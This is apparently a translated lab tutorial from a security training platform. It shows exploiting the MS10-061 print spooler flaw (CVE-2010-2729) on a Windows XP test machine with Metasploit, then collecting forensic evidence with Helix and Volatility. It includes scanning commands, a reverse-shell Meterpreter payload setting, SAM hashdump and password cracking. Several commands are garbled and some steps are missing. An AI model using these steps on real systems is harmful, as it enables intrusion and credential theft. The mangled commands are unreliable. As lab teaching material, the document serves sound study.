1. What is Metasploit
Metasploit Framework is an open source penetration tool. The Metasploit Penetration Testing Framework has the largest public database of test vulnerabilities in the world. In short, Metasploit can be used to detect security vulnerabilities, but it can also be used for intrusions.
2. What is Helix
Security incident response and forensics tools
3. What is the Print Daemon Service Simulation vulnerability (CVE-2010-2729)
Use MSF attack module: MS10_061_spoolss
The Windows print daemon does not adequately restrict user access to the service, and an attacker can create a file in the Windows system directory (%SystemRoot%\system32) by submitting a special print request.
An attacker can specify any file name, including directory traversal, and by sending WritePrinter requests, the attacker has complete control over what the file is created.
After writing the file to the Windows system directory (%SystemRoot%\system32), use WMI to deploy the malicious program, because the system will automatically run the MOF file in the %SystemRoot%\System32\Wbem\MOF folder and execute commands.
The vulnerability was first discovered and applied to the famous Stuxnet worm.
4. Experimental environment
Attack plane: Kali Linux Target machine: Windows XP SP2
5. Experimental steps
5.1 Using Nmap to Check whether the NetBios and RPC services exist on the target machine
5.2 NetBios Share Detection
5.3 Attack the target computer with MSF module MS10_061_spoolss
5.4 Collecting Basic Evidence Files
5.5 Using Helix Remote Memory Forensics
5.6 Downloading Basic Forensic Files
6. Download Helix
7. Set the target environment
1. Obtain the IP address of the target computer
Create shared print (default: no shared print)
1) Open the control panel and double-click “Print and fax”
8. Check print sharing on Kali
1) NMAP scanning
Nmap-ss-su-o-p137-139,445 192.168.1.149Copy the code
2) Find the NetBIOS name
Nmblookup -a 192.168.1.149Copy the code
NetBIOS group name: MSHOME
The Master Browser: _MSBROWSE_
The second column explains: NetBIOS suffix
00: Workstation Service (Workstation name) Type: Group
03: Windows Messenger Service
06: Remote Access Server
20: File Service (also called Host Record)
21: Remote Access Service client
1B: Domain Master Browser-Primary Domain Controller for a Domain
1 d: the Master Browser
Column 4: Node type
B – node: 0 x01 Broadcast
P-node: 0x02 Peer (WINS only)
M-node: 0x04 Mixed (Broadcast, then WINS)
H-node: 0x08 Hybrid (WINS, then Broadcast)
9. Access SMB resources
Smbclient -l \\\WXPSP2 -i 192.168.1.149-nCopy the code
10. Use MSF to attack
1) Load the module and view the parameters to be configured
set PAYLOAD windows/meterpreter/reverse_tcp
Copy the code4) Set the payload parameter
The malicious program is written to the target machine’s %SystemRoot%\ System32\ g9bmJiyNobtyos.exe, which bounces a shell to Kali, thus establishing a Meterpreter session. Please record the name of this program for later use
The malicious program is controlled by %SystemRoot%\ System32 \wbem\ moof \ kt044wVLbyxwgk.mof
6) Next we can perform a series of operations
6.1) GetuID, getPID
system
getpid
6.2) By executing shell, you can directly enter the command line interface of the target computer
6.4) Find the network link associated with PID 392
11. Conduct basic information collection and forensics
11.1) Process information collection
tasklist > forensics_tasklist.txt
Copy the code
netstat -ano > forensics_netstat.txt
Copy the code
dir > dir_forensics.txt
Copy the code
12. Obtain SAM database information
Get the SAM database using hashdump
SAM is the database file that stores user passwords in Windows XP, Windows Vista, and Windows 7
13. Establish a remote forensics collection environment
14. Collect the memory information of the victim
1) Load Helix2008R1 CD
3) View the collected files
15. Download other forensic files
Download the process information, network information and malware we collected earlier
download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\dir_forensics.txt /forensics/ms10_061/
download C:\\WINDOWS\\system32\\g9bMJIYNoBtyOS.exe /forensics/ms10_061/
Copy the code
16. Use John to crack the password
After information collection is completed, we will use Volatility to analyze from captured memory
Volatility: Analyze the MS10-061 attack
17, description,
This article was originally published by Hetian Net Safety Laboratory.
About Hetian Net Safety Laboratory
Hetian Network security laboratory (www.hetianlab.com) – the leading domestic practical network security online education platform real environment, online practical network security; The experimental content covers: system security, software security, network security, Web security, mobile security, CTF, forensics analysis, penetration testing, network security awareness education and so on.